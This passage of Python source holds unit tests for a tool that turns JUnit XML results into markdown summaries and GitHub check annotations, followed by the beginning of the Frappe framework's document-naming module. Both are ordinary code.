'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF' 'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0' 'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe' 'K6buousrLZAAAA') def test_get_long_summary_with_digest_md_with_multiple_runs(self): # makes gzipped digest deterministic with mock.patch('gzip.time.time', return_value=0): actual = get_long_summary_with_digest_md( UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=0, commit='commit' ) ) self.assertEqual(actual, '1 files    2 suites   3s :stopwatch:\n' '4 tests   5 :heavy_check_mark:   6 :zzz:   7 :x:\n' '9 runs  10 :heavy_check_mark: 11 :zzz: 12 :x:\n' '\n' 'Results for commit commit.\n' '\n' '[test-results]:data:application/gzip;base64,' 'H4sIAAAAAAAC/03MwQqDMBAE0F+RnD24aiv6M0VShaVqZJOciv' '/e0brR28wbmK8ZeRq86TLKM+Mjh6OUKO8ofWC3oFaoGMI+1Zpf' 'PloLeFzw4RXwTDD2PAGaBIOIE0gBkbjsf+0Z9Y6KBP87IoXzjk' 'qF+51188wBRdP2A3NU1srcAAAA') def test_get_long_summary_with_digest_md_with_test_errors(self): # makes gzipped digest deterministic with mock.patch('gzip.time.time', return_value=0): actual = get_long_summary_with_digest_md( UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13, commit='commit' ) ) self.assertEqual(actual, '1 files    2 suites   3s :stopwatch:\n' '4 tests   5 :heavy_check_mark:   6 :zzz:   7 :x:   8 :fire:\n' '9 runs  10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n' '\n' 'Results for commit commit.\n' '\n' '[test-results]:data:application/gzip;base64,' 'H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP' 'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr' '+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH' 'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA') def test_get_long_summary_with_digest_md_with_parse_errors(self): # makes gzipped digest deterministic with mock.patch('gzip.time.time', return_value=0): actual = get_long_summary_with_digest_md( UnitTestRunResults( files=1, errors=errors, suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13, commit='commit' ) ) self.assertEqual(actual, '1 files    1 errors    2 suites   3s :stopwatch:\n' '4 tests   5 :heavy_check_mark:   6 :zzz:   7 :x:   8 :fire:\n' '9 runs  10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n' '\n' 'Results for commit commit.\n' '\n' '[test-results]:data:application/gzip;base64,' 'H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP' 'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr' '+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH' 'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA') def test_get_long_summary_with_digest_md_with_delta(self): # makes gzipped digest deterministic with mock.patch('gzip.time.time', return_value=0): actual = get_long_summary_with_digest_md( UnitTestRunDeltaResults( files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4), tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9), runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14), commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef' ), UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8, commit='commit' ) ) self.assertEqual(actual, '1 files  +  2    2 suites   - 3   3s :stopwatch: +4s\n' '4 tests  -   5    5 :heavy_check_mark: +  6    6 :zzz:  -   7    7 :x: +  8    8 :fire:  -   9 \n' '9 runs  +10  10 :heavy_check_mark:  - 11  11 :zzz: +12  12 :x:  - 13  13 :fire: +14 \n' '\n' 'Results for commit 12345678. ± Comparison against type commit 01234567.\n' '\n' '[test-results]:data:application/gzip;base64,' 'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF' 'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0' 'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe' 'K6buousrLZAAAA') def test_get_long_summary_with_digest_md_with_delta_and_parse_errors(self): # makes gzipped digest deterministic with mock.patch('gzip.time.time', return_value=0): actual = get_long_summary_with_digest_md( UnitTestRunDeltaResults( files=n(1, 2), errors=errors, suites=n(2, -3), duration=d(3, 4), tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9), runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14), commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef' ), UnitTestRunResults( files=1, errors=[], suites=2, duration=3, tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8, runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8, commit='commit' ) ) self.assertEqual(actual, '1 files  +  2    1 errors    2 suites   - 3   3s :stopwatch: +4s\n' '4 tests  -   5    5 :heavy_check_mark: +  6    6 :zzz:  -   7    7 :x: +  8    8 :fire:  -   9 \n' '9 runs  +10  10 :heavy_check_mark:  - 11  11 :zzz: +12  12 :x:  - 13  13 :fire: +14 \n' '\n' 'Results for commit 12345678. ± Comparison against type commit 01234567.\n' '\n' '[test-results]:data:application/gzip;base64,' 'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF' 'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0' 'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe' 'K6buousrLZAAAA') def test_get_long_summary_with_digest_md_with_delta_results_only(self): with self.assertRaises(ValueError) as context: get_long_summary_with_digest_md(UnitTestRunDeltaResults( files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4), tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9), runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14), commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef' )) self.assertIn('stats must be UnitTestRunResults when no digest_stats is given', context.exception.args) def test_get_case_messages(self): results = UnitTestCaseResults([ ((None, 'class1', 'test1'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.0), UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.1), UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message2', content='content2', time=1.2), ])), ('skipped', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message2', content='content2', time=None), UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message3', content='content3', time=None), ])), ('failure', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.23), UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.234), ])), ('error', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='error', message='message5', content='content5', time=1.2345), ])), ])), ((None, 'class2', 'test2'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None) ])), ('skipped', list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None) ])), ('failure', list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None) ])), ('error', list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None) ])), ])) ]) expected = CaseMessages([ ((None, 'class1', 'test1'), dict([ ('success', defaultdict(list, [ ('content1', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.0), UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.1), ])), ('content2', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message2', content='content2', time=1.2), ])) ])), ('skipped', defaultdict(list, [ ('message2', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message2', content='content2', time=None), ])), ('message3', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message3', content='content3', time=None), ])) ])), ('failure', defaultdict(list, [ ('content4', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.23), UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.234), ])), ])), ('error', defaultdict(list, [ ('content5', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='error', message='message5', content='content5', time=1.2345), ])), ])), ])), ((None, 'class2', 'test2'), dict([ ('success', dict([ (None, list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None) ])), ])), ('skipped', dict([ (None, list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None) ])), ])), ('failure', dict([ (None, list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None) ])), ])), ('error', dict([ (None, list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None) ])), ])), ])) ]) actual = get_case_messages(results) self.assertEqual(expected, actual) def test_annotation_to_dict(self): annotation = Annotation(path='file1', start_line=123, end_line=123, start_column=4, end_column=5, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2') self.assertEqual(dict(path='file1', start_line=123, end_line=123, start_column=4, end_column=5, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), annotation.to_dict()) annotation = Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)', raw_details=None) self.assertEqual(dict(path='class2', start_line=0, end_line=0, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)'), annotation.to_dict()) annotation = Annotation(path='file', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='message', title=None, raw_details=None) self.assertEqual(dict(path='file', start_line=0, end_line=0, annotation_level='notice', message='message'), annotation.to_dict()) def test_annotation_to_dict_abbreviation(self): annotation = Annotation(path='file', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='message ' * 8000, title='title - ' * 31, raw_details='raw ' * 16000) self.assertEqual('message ' * 8000, annotation.to_dict().get('message')) self.assertEqual('title - ' * 31, annotation.to_dict().get('title')) self.assertEqual('raw ' * 16000, annotation.to_dict().get('raw_details')) annotation = Annotation(path='file', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='message ' * 8001, title='title - ' * 32, raw_details='raw ' * 16001) self.assertEqual('message ' * 3999 + 'message…ssage ' + 'message ' * 3999, annotation.to_dict().get('message')) self.assertEqual('title - ' * 15 + 'title -…itle - ' + 'title - ' * 15, annotation.to_dict().get('title')) self.assertEqual('raw ' * 8000 + '…aw ' + 'raw ' * 7999, annotation.to_dict().get('raw_details')) def test_get_case_annotation(self): messages = CaseMessages([ ((None, 'class1', 'test1'), dict([ ('success', dict([ ('message1', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='message1', content=None, time=1.0) ])) ])), ('skipped', dict([ ('message2', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='message2', content=None, time=1.0) ])) ])), ('failure', dict([ ('message3', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='', test_name='test1', result='failure', message='message3', content=None, time=1.0) ])), ('message4', list([ UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.0), UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.0) ])), ])), ('error', dict([ ('message5', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='message6', content=None, time=1.0) ])) ])), ])), ((None, 'class2', 'test2'), dict([ ('success', dict([ (None, list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None) ])), ])), ('skipped', dict([ (None, list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None) ])), ])), ('failure', dict([ (None, list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None) ])), ])), ('error', dict([ (None, list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None) ])), ])), ])) ]) self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), get_case_annotation(messages, (None, 'class1', 'test1'), 'skipped', 'message2', report_individual_runs=False)) self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1\nresult-file2\nresult-file3', title='3 out of 6 runs failed: test1', raw_details='message3'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message3', report_individual_runs=False)) self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1\nresult-file2\nresult-file3', title='3 out of 6 runs failed: test1 (class1)', raw_details='message4'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message4', report_individual_runs=False)) self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 6 runs with error: test1 (class1)', raw_details='message5'), get_case_annotation(messages, (None, 'class1', 'test1'), 'error', 'message5', report_individual_runs=False)) self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 4 runs skipped: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'skipped', None, report_individual_runs=False)) self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='warning', message='result-file1', title='1 out of 4 runs failed: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'failure', None, report_individual_runs=False)) self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'error', None, report_individual_runs=False)) def test_get_case_annotation_report_individual_runs(self): messages = CaseMessages([ ((None, 'class1', 'test1'), dict([ ('success', dict([ ('message1', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='message1', content=None, time=1.0) ])) ])), ('skipped', dict([ ('message2', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='message2', content=None, time=None) ])) ])), ('failure', dict([ ('message3', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='', test_name='test1', result='failure', message='message3', content=None, time=1.23) ])), ('message4', list([ UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.234), UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.234) ])), ])), ('error', dict([ ('message5', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='message6', content=None, time=1.2345) ])) ])), ])) ]) self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), get_case_annotation(messages, (None, 'class1', 'test1'), 'skipped', 'message2', report_individual_runs=True)) self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1', title='1 out of 6 runs failed: test1', raw_details='message3'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message3', report_individual_runs=True)) self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file2\nresult-file3', title='2 out of 6 runs failed: test1 (class1)', raw_details='message4'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message4', report_individual_runs=True)) self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 6 runs with error: test1 (class1)', raw_details='message5'), get_case_annotation(messages, (None, 'class1', 'test1'), 'error', 'message5', report_individual_runs=True)) def test_get_case_annotations(self): results = UnitTestCaseResults([ ((None, 'class1', 'test1'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0) ])), ('skipped', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None) ])), ('failure', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 1', content='fail content 1', time=1.2), UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.23), UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.234) ])), ('error', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='error message', content='error content', time=1.2345) ])), ])), ((None, 'class2', 'test2'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None) ])), ('skipped', list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None) ])), ('failure', list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None) ])), ('error', list([ UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None) ])), ])) ]) expected = [ Annotation( annotation_level='warning', end_column=None, end_line=123, message='result-file1\nresult-file2\nresult-file3', path='file1', start_column=None, start_line=123, title='3 out of 6 runs failed: test1 (class1)', raw_details='fail content 1' ), Annotation( annotation_level='failure', end_column=None, end_line=123, message='result-file1', path='file1', start_column=None, start_line=123, title='1 out of 6 runs with error: test1 (class1)', raw_details='error content' ), Annotation( annotation_level='warning', end_column=None, end_line=0, message='result-file1', path='class2', start_column=None, start_line=0, title='1 out of 4 runs failed: test2 (class2)', raw_details=None ), Annotation( annotation_level='failure', end_column=None, end_line=0, message='result-file1', path='class2', start_column=None, start_line=0, title='1 out of 4 runs with error: test2 (class2)', raw_details=None ), ] annotations = get_case_annotations(results, report_individual_runs=False) self.assertEqual(expected, annotations) def test_get_case_annotations_report_individual_runs(self): results = UnitTestCaseResults([ ((None, 'class1', 'test1'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0) ])), ('skipped', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None) ])), ('failure', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 1', content='fail content 1', time=1.2), UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.23), UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.234) ])), ('error', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='error message', content='error content', time=0.1) ])), ])) ]) expected = [ Annotation( annotation_level='warning', end_column=None, end_line=123, message='result-file1', path='file1', start_column=None, start_line=123, title='1 out of 6 runs failed: test1 (class1)', raw_details='fail content 1' ), Annotation( annotation_level='warning', end_column=None, end_line=123, message='result-file2\nresult-file3', path='file1', start_column=None, start_line=123, title='2 out of 6 runs failed: test1 (class1)', raw_details='fail content 2' ), Annotation( annotation_level='failure', end_column=None, end_line=123, message='result-file1', path='file1', start_column=None, start_line=123, title='1 out of 6 runs with error: test1 (class1)', raw_details='error content' ) ] annotations = get_case_annotations(results, report_individual_runs=True) self.assertEqual(expected, annotations) def test_get_error_annotation(self): self.assertEqual(Annotation(path='file', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', None, None))) self.assertEqual(Annotation(path='file', start_line=12, end_line=12, start_column=None, end_column=None, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', 12, None))) self.assertEqual(Annotation(path='file', start_line=12, end_line=12, start_column=34, end_column=34, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', 12, 34))) def test_get_all_tests_list_annotation(self): results = UnitTestCaseResults([ ((None, 'class1', 'test2'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0) ])), ])), ((None, 'class1', 'test1'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0) ])), ('skipped', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None) ])), ])), (('file', 'class1', 'test2'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0) ])), ])) ]) self.assertIsNone(get_all_tests_list_annotation(UnitTestCaseResults())) self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There are 3 tests, see "Raw output" for the full list of tests.', title='3 tests found', raw_details='class1 ‑ test1\nclass1 ‑ test2\nfile ‑ class1 ‑ test2'), get_all_tests_list_annotation(results)) del results[(None, 'class1', 'test1')] del results[('file', 'class1', 'test2')] self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There is 1 test, see "Raw output" for the name of the test.', title='1 test found', raw_details='class1 ‑ test2'), get_all_tests_list_annotation(results)) def test_get_skipped_tests_list_annotation(self): results = UnitTestCaseResults([ ((None, 'class1', 'test2'), dict([ ('skipped', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0) ])), ])), ((None, 'class1', 'test1'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0) ])), ('skipped', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None) ])), ])), (('file', 'class1', 'test2'), dict([ ('success', list([ UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0) ])), ])) ]) self.assertIsNone(get_skipped_tests_list_annotation(UnitTestCaseResults())) self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There is 1 skipped test, see "Raw output" for the name of the skipped test.', title='1 skipped test found', raw_details='class1 ‑ test2'), get_skipped_tests_list_annotation(results)) del results[(None, 'class1', 'test1')]['success'] self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There are 2 skipped tests, see "Raw output" for the full list of skipped tests.', title='2 skipped tests found', raw_details='class1 ‑ test1\nclass1 ‑ test2'), get_skipped_tests_list_annotation(results)) def test_files(self): parsed = parse_junit_xml_files(['files/junit.gloo.elastic.spark.tf.xml', 'files/junit.gloo.elastic.spark.torch.xml', 'files/junit.gloo.elastic.xml', 'files/junit.gloo.standalone.xml', 'files/junit.gloo.static.xml', 'files/junit.mpi.integration.xml', 'files/junit.mpi.standalone.xml', 'files/junit.mpi.static.xml', 'files/junit.spark.integration.1.xml', 'files/junit.spark.integration.2.xml']).with_commit('example') results = get_test_results(parsed, False) stats = get_stats(results) md = get_long_summary_md(stats) self.assertEqual(md, ('  10 files    10 suites   39m 1s :stopwatch:\n' '217 tests 208 :heavy_check_mark:   9 :zzz: 0 :x:\n' '373 runs  333 :heavy_check_mark: 40 :zzz: 0 :x:\n' '\n' 'Results for commit example.\n')) def test_file_without_cases(self): parsed = parse_junit_xml_files(['files/no-cases.xml']).with_commit('a commit sha') results = get_test_results(parsed, False) stats = get_stats(results) md = get_long_summary_md(stats) self.assertEqual(md, ('1 files  1 suites   0s :stopwatch:\n' '0 tests 0 :heavy_check_mark: 0 :zzz: 0 :x:\n' '\n' 'Results for commit a commit.\n')) def test_non_parsable_file(self): parsed = parse_junit_xml_files(['files/empty.xml']).with_commit('a commit sha') results = get_test_results(parsed, False) stats = get_stats(results) md = get_long_summary_md(stats) self.assertEqual(md, ('1 files  1 errors  0 suites   0s :stopwatch:\n' '0 tests 0 :heavy_check_mark: 0 :zzz: 0 :x:\n' '\n' 'Results for commit a commit.\n')) if __name__ == '__main__': unittest.main()
py
1a3f90da3746c2453e41bab59b5bd66999ee8353
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals import frappe from frappe import _ from frappe.utils import now_datetime, cint, cstr import re from six import string_types from frappe.model import log_types def set_new_name(doc): """ Sets the `name` property for the document based on various rules. 1. If amended doc, set suffix. 2. If `autoname` method is declared, then call it. 3. If `autoname` property is set in the DocType (`meta`), then build it using the `autoname` property. 4. If no rule defined, use hash. :param doc: Document to be named. """ doc.run_method("before_naming") autoname = frappe.get_meta(doc.doctype).autoname or "" if autoname.lower() != "prompt" and not frappe.flags.in_import: doc.name = None if getattr(doc, "amended_from", None): _set_amended_name(doc) return elif getattr(doc.meta, "issingle", False): doc.name = doc.doctype elif getattr(doc.meta, "istable", False): doc.name = make_autoname("hash", doc.doctype) if not doc.name: set_naming_from_document_naming_rule(doc) if not doc.name: doc.run_method("autoname") if not doc.name and autoname: set_name_from_naming_options(autoname, doc) # if the autoname option is 'field:' and no name was derived, we need to # notify if not doc.name and autoname.startswith("field:"): fieldname = autoname[6:] frappe.throw(_("{0} is required").format(doc.meta.get_label(fieldname))) # at this point, we fall back to name generation with the hash option if not doc.name and autoname == "hash": doc.name = make_autoname("hash", doc.doctype) if not doc.name: doc.name = make_autoname("hash", doc.doctype) doc.name = validate_name( doc.doctype, doc.name, frappe.get_meta(doc.doctype).get_field("name_case") ) def set_name_from_naming_options(autoname, doc): """ Get a name based on the autoname field option """ _autoname = autoname.lower() if _autoname.startswith("field:"): doc.name = _field_autoname(autoname, doc) elif _autoname.startswith("naming_series:"): set_name_by_naming_series(doc) elif _autoname.startswith("prompt"): _prompt_autoname(autoname, doc) elif _autoname.startswith("format:"): doc.name = _format_autoname(autoname, doc) elif "#" in autoname: doc.name = make_autoname(autoname, doc=doc) def set_naming_from_document_naming_rule(doc): ''' Evaluate rules based on "Document Naming Series" doctype ''' if doc.doctype in log_types: return # ignore_ddl if naming is not yet bootstrapped for d in frappe.get_all('Document Naming Rule', dict(document_type=doc.doctype, disabled=0), order_by='priority desc', ignore_ddl=True): frappe.get_cached_doc('Document Naming Rule', d.name).apply(doc) if doc.name: break def set_name_by_naming_series(doc): """Sets name by the `naming_series` property""" if not doc.naming_series: doc.naming_series = get_default_naming_series(doc.doctype) if not doc.naming_series: frappe.throw(frappe._("Naming Series mandatory")) doc.name = make_autoname(doc.naming_series+".#####", "", doc) def make_autoname(key="", 